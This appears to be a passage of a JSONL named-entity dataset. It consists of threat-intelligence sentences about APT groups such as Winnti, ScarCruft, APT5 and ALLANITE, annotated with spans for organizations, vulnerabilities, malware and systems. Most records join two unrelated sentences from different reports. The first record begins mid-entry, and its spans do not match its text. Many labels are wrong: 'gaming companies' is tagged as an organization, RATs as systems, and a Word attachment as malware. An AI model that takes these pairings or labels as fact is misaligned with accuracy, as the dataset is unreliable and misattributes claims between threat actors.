In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers \u2013 an American video game company .", "spans": [{"start": 19, "end": 24, "label": "Organization"}, {"start": 39, "end": 69, "label": "Vulnerability"}, {"start": 70, "end": 84, "label": "Vulnerability"}, {"start": 95, "end": 103, "label": "System"}, {"start": 108, "end": 119, "label": "System"}, {"start": 143, "end": 152, "label": "Organization"}, {"start": 187, "end": 193, "label": "Organization"}, {"start": 255, "end": 261, "label": "Malware"}, {"start": 278, "end": 284, "label": "Organization"}, {"start": 312, "end": 330, "label": "Organization"}]} {"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 31, "end": 44, "label": "System"}, {"start": 65, "end": 78, "label": "Vulnerability"}, {"start": 101, "end": 113, "label": "Organization"}, {"start": 170, "end": 186, "label": "Organization"}]} {"text": "Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . 
In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group .", "spans": [{"start": 87, "end": 144, "label": "Vulnerability"}, {"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 229, "end": 236, "label": "Organization"}, {"start": 274, "end": 280, "label": "Malware"}, {"start": 281, "end": 288, "label": "Malware"}]} {"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . The Axiom group has been presented as an advanced Chinese threat actor carrying out cyber-espionage attacks against a whole range of different industries .", "spans": [{"start": 80, "end": 105, "label": "Malware"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 166, "end": 178, "label": "System"}, {"start": 210, "end": 236, "label": "System"}, {"start": 239, "end": 242, "label": "System"}, {"start": 251, "end": 256, "label": "Organization"}]} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . this library includes two drivers compiled on August 22 and September 4 , 2014 .", "spans": [{"start": 84, "end": 109, "label": "Malware"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 182, "label": "System"}, {"start": 214, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}]} {"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . 
Also our visibility as a vendor does not cover every company in the world ( at least so far ; ) ) and the Kaspersky Security Network ( KSN ) did not reveal other attacks except those against gaming companies .", "spans": [{"start": 86, "end": 99, "label": "Malware"}, {"start": 119, "end": 158, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 283, "end": 309, "label": "Organization"}, {"start": 312, "end": 315, "label": "Organization"}, {"start": 368, "end": 384, "label": "Organization"}]} {"text": "TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication . Conversely , LokiBot and Agent Tesla are new malware tools .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 56, "end": 59, "label": "Organization"}, {"start": 114, "end": 131, "label": "Vulnerability"}, {"start": 170, "end": 177, "label": "Malware"}, {"start": 182, "end": 193, "label": "Malware"}]} {"text": "TG-3390 actors have used Java exploits in their SWCs . Based on multiple active compromises by the Axiom threat group , Novetta was able to capture and analyze new Winnti malware samples .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 25, "end": 38, "label": "Vulnerability"}, {"start": 48, "end": 52, "label": "System"}, {"start": 120, "end": 127, "label": "Organization"}, {"start": 164, "end": 186, "label": "Malware"}]} {"text": "In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . 
Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China .", "spans": [{"start": 16, "end": 23, "label": "Organization"}, {"start": 38, "end": 51, "label": "Vulnerability"}, {"start": 119, "end": 139, "label": "System"}, {"start": 146, "end": 159, "label": "Vulnerability"}, {"start": 181, "end": 186, "label": "System"}, {"start": 351, "end": 371, "label": "Organization"}]} {"text": "In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China .", "spans": [{"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 130, "end": 150, "label": "System"}, {"start": 157, "end": 170, "label": "Vulnerability"}, {"start": 192, "end": 197, "label": "System"}, {"start": 362, "end": 382, "label": "Organization"}]} {"text": "TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . The samples Novetta obtained from the active Axiom infection were compiled in mid- to late 2014 and represent what Novetta is referring to as version 3.0 of the Winnti lineage .", "spans": [{"start": 139, "end": 146, "label": "Organization"}, {"start": 242, "end": 249, "label": "Organization"}, {"start": 288, "end": 294, "label": "Organization"}]} {"text": "Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can\u2032t prove they were related to this particular attack . 
We assess with high confidence that the Winnti umbrella is associated with the Chinese state intelligence apparatus , with at least some elements located in the Xicheng District of Beijing .", "spans": [{"start": 65, "end": 79, "label": "Vulnerability"}, {"start": 82, "end": 114, "label": "System"}, {"start": 281, "end": 287, "label": "Malware"}]} {"text": "LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . The Winnti umbrella continues to operate highly successfully in 2018 .", "spans": [{"start": 48, "end": 78, "label": "Vulnerability"}, {"start": 81, "end": 95, "label": "Vulnerability"}, {"start": 104, "end": 110, "label": "Malware"}]} {"text": "No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" \u2014 a near-year-old Java security hole \u2014 \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . The Winnti umbrella and closely associated entities has been active since at least 2009 .", "spans": [{"start": 3, "end": 27, "label": "Vulnerability"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 185, "end": 198, "label": "Vulnerability"}, {"start": 231, "end": 248, "label": "Organization"}, {"start": 276, "end": 282, "label": "Malware"}]} {"text": "Execute a command through exploits for CVE-2017-11882 . The Winnti and Axiom group names were created by Kaspersky Lab and Symantec , respectively , for their 2013/2014 reports on the original group .", "spans": [{"start": 39, "end": 53, "label": "Vulnerability"}, {"start": 60, "end": 66, "label": "Organization"}, {"start": 105, "end": 118, "label": "Organization"}, {"start": 123, "end": 131, "label": "Organization"}]} {"text": "Execute a command through exploits for CVE-2018-0802 . 
Their operations against gaming and technology organizations are believed to be economically motivated in nature .", "spans": [{"start": 39, "end": 52, "label": "Vulnerability"}, {"start": 80, "end": 86, "label": "Organization"}, {"start": 91, "end": 115, "label": "Organization"}]} {"text": "The document attached to this e-mail exploits CVE-2012-0158 . However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused .", "spans": [{"start": 30, "end": 45, "label": "Vulnerability"}, {"start": 46, "end": 59, "label": "Vulnerability"}]} {"text": "Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . The Winnti umbrella and linked groups' initial targets are gaming studios and high tech businesses .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 40, "end": 53, "label": "Vulnerability"}, {"start": 88, "end": 94, "label": "Malware"}, {"start": 143, "end": 157, "label": "Organization"}, {"start": 162, "end": 182, "label": "Organization"}]} {"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . During the same time period , we also observed the actor using the Browser Exploitation Framework ( BeEF ) to compromise victim hosts and download Cobalt Strike .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 166, "end": 196, "label": "Vulnerability"}, {"start": 388, "end": 401, "label": "Malware"}]} {"text": "the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . 
In this campaign , the attackers experimented with publicly available tooling for attack operations .", "spans": [{"start": 43, "end": 56, "label": "Vulnerability"}, {"start": 57, "end": 68, "label": "Vulnerability"}, {"start": 145, "end": 171, "label": "Malware"}]} {"text": "While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . The primary goal of these attacks was likely to find code-signing certificates for signing future malware .", "spans": [{"start": 89, "end": 102, "label": "Vulnerability"}, {"start": 103, "end": 122, "label": "Vulnerability"}, {"start": 141, "end": 151, "label": "Organization"}]} {"text": "However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . The Chinese intelligence apparatus has been reported on under many names , including Winnti , PassCV , APT17 , Axiom , LEAD , Barium , Wicked Panda , and GREF .", "spans": [{"start": 36, "end": 41, "label": "Organization"}, {"start": 50, "end": 67, "label": "Vulnerability"}, {"start": 212, "end": 218, "label": "Malware"}, {"start": 253, "end": 259, "label": "Organization"}]} {"text": "PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221.216.0.0/13 .", "spans": [{"start": 108, "end": 127, "label": "Vulnerability"}, {"start": 130, "end": 143, "label": "Vulnerability"}]} {"text": "PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . 
ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security ( DHS ) .", "spans": [{"start": 16, "end": 29, "label": "Vulnerability"}, {"start": 225, "end": 256, "label": "Organization"}, {"start": 259, "end": 262, "label": "Organization"}]} {"text": "Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 96, "end": 109, "label": "Vulnerability"}, {"start": 112, "end": 125, "label": "Vulnerability"}, {"start": 250, "end": 281, "label": "Organization"}]} {"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems .", "spans": [{"start": 7, "end": 15, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 221, "end": 241, "label": "Malware"}]} {"text": "Moreover , they used the same exploit kit Niteris as that in the Corkow case . 
In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly ( which Dragos associates with DYMALLOY ) .", "spans": [{"start": 38, "end": 49, "label": "Vulnerability"}, {"start": 65, "end": 71, "label": "System"}, {"start": 99, "end": 102, "label": "Organization"}, {"start": 189, "end": 197, "label": "Organization"}, {"start": 204, "end": 213, "label": "Organization"}, {"start": 222, "end": 228, "label": "Organization"}, {"start": 245, "end": 253, "label": "Malware"}]} {"text": "The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group .", "spans": [{"start": 4, "end": 17, "label": "Vulnerability"}, {"start": 104, "end": 107, "label": "Organization"}]} {"text": "The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . We assess with high confidence that the attackers discussed here are associated with the Chinese state intelligence apparatus .", "spans": [{"start": 4, "end": 19, "label": "System"}, {"start": 32, "end": 47, "label": "Vulnerability"}, {"start": 90, "end": 101, "label": "Organization"}, {"start": 105, "end": 115, "label": "Organization"}]} {"text": "While documents designed to exploit the InPage software are rare , they are not new \u2013 however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . 
ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities .", "spans": [{"start": 40, "end": 55, "label": "System"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 139, "end": 154, "label": "Vulnerability"}, {"start": 250, "end": 259, "label": "Organization"}]} {"text": "Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly .", "spans": [{"start": 12, "end": 21, "label": "Organization"}, {"start": 191, "end": 204, "label": "Vulnerability"}, {"start": 209, "end": 223, "label": "Vulnerability"}, {"start": 246, "end": 249, "label": "Organization"}, {"start": 336, "end": 344, "label": "Organization"}, {"start": 351, "end": 360, "label": "Organization"}]} {"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . Public disclosure by third-parties , including the DHS , associate ALLANITE operations with Russian strategic interests .", "spans": [{"start": 9, "end": 18, "label": "Organization"}, {"start": 45, "end": 54, "label": "Malware"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 133, "end": 136, "label": "Organization"}]} {"text": "Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . 
ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 105, "end": 118, "label": "Vulnerability"}, {"start": 123, "end": 137, "label": "Vulnerability"}, {"start": 241, "end": 248, "label": "System"}]} {"text": "The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation .", "spans": [{"start": 4, "end": 19, "label": "System"}, {"start": 73, "end": 86, "label": "Vulnerability"}, {"start": 89, "end": 95, "label": "Organization"}]} {"text": "The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . However , full details on ALLANITE and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": [{"start": 27, "end": 40, "label": "Vulnerability"}, {"start": 71, "end": 87, "label": "System"}, {"start": 90, "end": 93, "label": "Malware"}, {"start": 223, "end": 232, "label": "Malware"}, {"start": 377, "end": 393, "label": "Organization"}]} {"text": "Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . 
In addition to maritime operations in this region , Anchor Panda also heavily targeted western companies in the US , Germany , Sweden , the UK , and Australia , and other countries involved in maritime satellite systems , aerospace companies , and defense contractors .", "spans": [{"start": 27, "end": 45, "label": "Vulnerability"}, {"start": 67, "end": 79, "label": "Vulnerability"}, {"start": 378, "end": 397, "label": "Organization"}, {"start": 404, "end": 423, "label": "Organization"}]} {"text": "Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology .", "spans": [{"start": 45, "end": 60, "label": "Vulnerability"}, {"start": 103, "end": 108, "label": "Organization"}, {"start": 293, "end": 308, "label": "Organization"}]} {"text": "In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the LOC of operations of the South Sea Fleet of the PLA Navy .", "spans": [{"start": 81, "end": 94, "label": "Vulnerability"}, {"start": 136, "end": 148, "label": "Organization"}, {"start": 170, "end": 181, "label": "Organization"}]} {"text": "Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . 
ALLANITE operations continue and intelligence indicates activity since at least May 2017 .", "spans": [{"start": 45, "end": 57, "label": "Organization"}, {"start": 97, "end": 112, "label": "Organization"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 185, "end": 207, "label": "Vulnerability"}, {"start": 210, "end": 223, "label": "Vulnerability"}]} {"text": "The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . APT Anchor Panda is a Chinese threat actor group who target maritime operations .", "spans": [{"start": 19, "end": 41, "label": "System"}, {"start": 92, "end": 99, "label": "Organization"}, {"start": 122, "end": 138, "label": "Vulnerability"}, {"start": 141, "end": 154, "label": "Vulnerability"}]} {"text": "While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . According to cyber security researchers , Anchor Panda , who work directly for the Chinese PLA Navy , likely remains active .", "spans": [{"start": 125, "end": 141, "label": "Vulnerability"}, {"start": 144, "end": 157, "label": "Vulnerability"}]} {"text": "To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . Dragos does not corroborate nor conduct political attribution to threat activity .", "spans": [{"start": 69, "end": 85, "label": "System"}, {"start": 102, "end": 115, "label": "System"}, {"start": 152, "end": 168, "label": "Vulnerability"}, {"start": 171, "end": 184, "label": "Vulnerability"}, {"start": 187, "end": 193, "label": "Organization"}]} {"text": "This sample was also found to be deployed using the CVE-2012-0158 vulnerability . 
In the past they used Adobe Gh0st , Poison Ivy and Torn RAT malware ; their primary attack vector is spear phishing .", "spans": [{"start": 52, "end": 65, "label": "Vulnerability"}, {"start": 104, "end": 115, "label": "Malware"}, {"start": 118, "end": 128, "label": "Malware"}, {"start": 133, "end": 149, "label": "Malware"}]} {"text": "Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . Their targets are marine companies that operate in and around the South China Sea , an LOC of much Chinese interest .", "spans": [{"start": 52, "end": 65, "label": "Vulnerability"}, {"start": 77, "end": 95, "label": "System"}, {"start": 116, "end": 132, "label": "Organization"}]} {"text": "Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 31, "end": 42, "label": "System"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 89, "end": 107, "label": "System"}, {"start": 254, "end": 266, "label": "Organization"}]} {"text": "Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The cyber-espionage campaign has labelled the group Advanced Persistent Threat ( APT ) 40 or , titled , Periscope .", "spans": [{"start": 24, "end": 35, "label": "System"}, {"start": 57, "end": 70, "label": "Vulnerability"}, {"start": 82, "end": 100, "label": "System"}, {"start": 155, "end": 174, "label": "Organization"}, {"start": 175, "end": 192, "label": "Organization"}, {"start": 207, "end": 216, "label": "Organization"}]} {"text": "In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . 
The group has been active since at least January 2013 .", "spans": [{"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 95, "end": 113, "label": "System"}]} {"text": "In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states .", "spans": [{"start": 34, "end": 45, "label": "System"}, {"start": 67, "end": 80, "label": "Vulnerability"}, {"start": 96, "end": 114, "label": "System"}, {"start": 145, "end": 155, "label": "Organization"}]} {"text": "In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The main targets seem to be US companies in engineering , transport and defense , although it has targeted other organizations around the world .", "spans": [{"start": 38, "end": 49, "label": "System"}, {"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 100, "end": 118, "label": "System"}, {"start": 165, "end": 176, "label": "Organization"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 193, "end": 200, "label": "Organization"}]} {"text": "Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . 
The times of day the group is active also suggest that it is based near Beijing and the group has reportedly used malware that has been observed in other Chinese operations , indicating some level of collaboration .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 37, "end": 62, "label": "Vulnerability"}, {"start": 110, "end": 137, "label": "Malware"}, {"start": 140, "end": 167, "label": "Malware"}]} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Periscope 's activity has previously been suspected of being linked to China , but now researchers believe their evidence links the operation to the Chinese state .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}]} {"text": "Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . APT40 is described as a moderately sophisticated cyber-espionage group which combines access to significant development resources with the ability to leverage publicly available tools .", "spans": [{"start": 21, "end": 31, "label": "Organization"}, {"start": 61, "end": 96, "label": "Vulnerability"}, {"start": 128, "end": 133, "label": "Organization"}, {"start": 287, "end": 311, "label": "Malware"}]} {"text": "Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit . 
Anchor Panda uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities .", "spans": [{"start": 111, "end": 116, "label": "Vulnerability"}, {"start": 119, "end": 145, "label": "Vulnerability"}, {"start": 330, "end": 358, "label": "Malware"}]} {"text": "Adobe Flash Player exploit . Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network .", "spans": [{"start": 0, "end": 26, "label": "Vulnerability"}, {"start": 69, "end": 74, "label": "Organization"}, {"start": 139, "end": 145, "label": "System"}, {"start": 185, "end": 201, "label": "Malware"}]} {"text": "It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . The group uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities .", "spans": [{"start": 25, "end": 34, "label": "Organization"}, {"start": 52, "end": 68, "label": "Vulnerability"}, {"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 295, "end": 323, "label": "Malware"}]} {"text": "Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors .", "spans": [{"start": 35, "end": 55, "label": "Vulnerability"}, {"start": 58, "end": 71, "label": "Vulnerability"}]} {"text": "ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . 
APT5 has been active since at least 2007 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 48, "end": 68, "label": "Vulnerability"}, {"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 130, "end": 134, "label": "Organization"}]} {"text": "Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . APT5 has targeted or breached organizations across multiple industries , but its focus appears to be on telecommunications and technology companies , especially information about satellite communications .", "spans": [{"start": 49, "end": 58, "label": "Organization"}, {"start": 92, "end": 109, "label": "Vulnerability"}, {"start": 147, "end": 151, "label": "Organization"}, {"start": 251, "end": 269, "label": "Organization"}, {"start": 274, "end": 294, "label": "Organization"}, {"start": 326, "end": 350, "label": "Organization"}]} {"text": "This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . APT5 targeted the network of an electronics firm that sells products for both industrial and military applications .", "spans": [{"start": 63, "end": 76, "label": "Vulnerability"}, {"start": 80, "end": 85, "label": "System"}, {"start": 135, "end": 139, "label": "Organization"}, {"start": 167, "end": 183, "label": "Organization"}, {"start": 213, "end": 223, "label": "Organization"}, {"start": 228, "end": 236, "label": "Organization"}]} {"text": "Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . 
The group subsequently stole communications related to the firm 's business relationship with a national military , including inventories and memoranda about specific products they provided .", "spans": [{"start": 39, "end": 74, "label": "Vulnerability"}, {"start": 135, "end": 149, "label": "Organization"}, {"start": 211, "end": 219, "label": "Organization"}]} {"text": "The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . In one case in late 2014 , APT5 breached the network of an international telecommunications company .", "spans": [{"start": 77, "end": 90, "label": "Vulnerability"}, {"start": 181, "end": 221, "label": "Organization"}]} {"text": "The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies .", "spans": [{"start": 68, "end": 81, "label": "Vulnerability"}, {"start": 257, "end": 285, "label": "Organization"}]} {"text": "The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . APT5 also targeted the networks of some of Southeast Asia 's major telecommunications providers with Leouncia malware .", "spans": [{"start": 41, "end": 55, "label": "Vulnerability"}, {"start": 231, "end": 259, "label": "Organization"}, {"start": 265, "end": 273, "label": "Malware"}, {"start": 274, "end": 281, "label": "Malware"}]} {"text": "Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . 
We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems .", "spans": [{"start": 28, "end": 50, "label": "Vulnerability"}]} {"text": "Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . The FBI said the \" group of malicious cyber actors \" ( known as APT6 or 1.php ) used dedicated top-level domains in conjunction with the command and control servers to deliver \" customized malicious software \" to government computer systems .", "spans": [{"start": 15, "end": 28, "label": "Organization"}, {"start": 94, "end": 102, "label": "Vulnerability"}, {"start": 156, "end": 169, "label": "Organization"}, {"start": 206, "end": 209, "label": "Organization"}, {"start": 266, "end": 270, "label": "Organization"}, {"start": 274, "end": 279, "label": "Indicator"}, {"start": 380, "end": 409, "label": "Malware"}]} {"text": "Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . 
Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 26, "end": 35, "label": "Organization"}, {"start": 65, "end": 73, "label": "Vulnerability"}, {"start": 76, "end": 89, "label": "Vulnerability"}, {"start": 167, "end": 173, "label": "Organization"}, {"start": 262, "end": 292, "label": "Organization"}, {"start": 295, "end": 313, "label": "Organization"}, {"start": 329, "end": 346, "label": "Organization"}, {"start": 358, "end": 376, "label": "Organization"}]} {"text": "Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": [{"start": 65, "end": 78, "label": "Vulnerability"}, {"start": 81, "end": 94, "label": "Vulnerability"}, {"start": 161, "end": 181, "label": "Organization"}]} {"text": "Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . 
According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file .", "spans": [{"start": 82, "end": 90, "label": "Vulnerability"}, {"start": 91, "end": 104, "label": "Vulnerability"}, {"start": 120, "end": 126, "label": "Organization"}, {"start": 129, "end": 133, "label": "Organization"}, {"start": 189, "end": 192, "label": "Malware"}, {"start": 197, "end": 200, "label": "Malware"}, {"start": 277, "end": 285, "label": "Indicator"}]} {"text": "Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . Nearly a month later , security experts are now shining a bright light on the alert and the mysterious group behind the attack .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 39, "end": 70, "label": "System"}, {"start": 94, "end": 105, "label": "Organization"}, {"start": 132, "end": 152, "label": "Vulnerability"}]} {"text": "Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . The attacks discussed in this blog are related to an APT campaign commonly referred to as \" th3bug \" , named for the password the actors often use with their Poison Ivy malware .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 43, "end": 64, "label": "Vulnerability"}, {"start": 266, "end": 284, "label": "Malware"}]} {"text": "Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . 
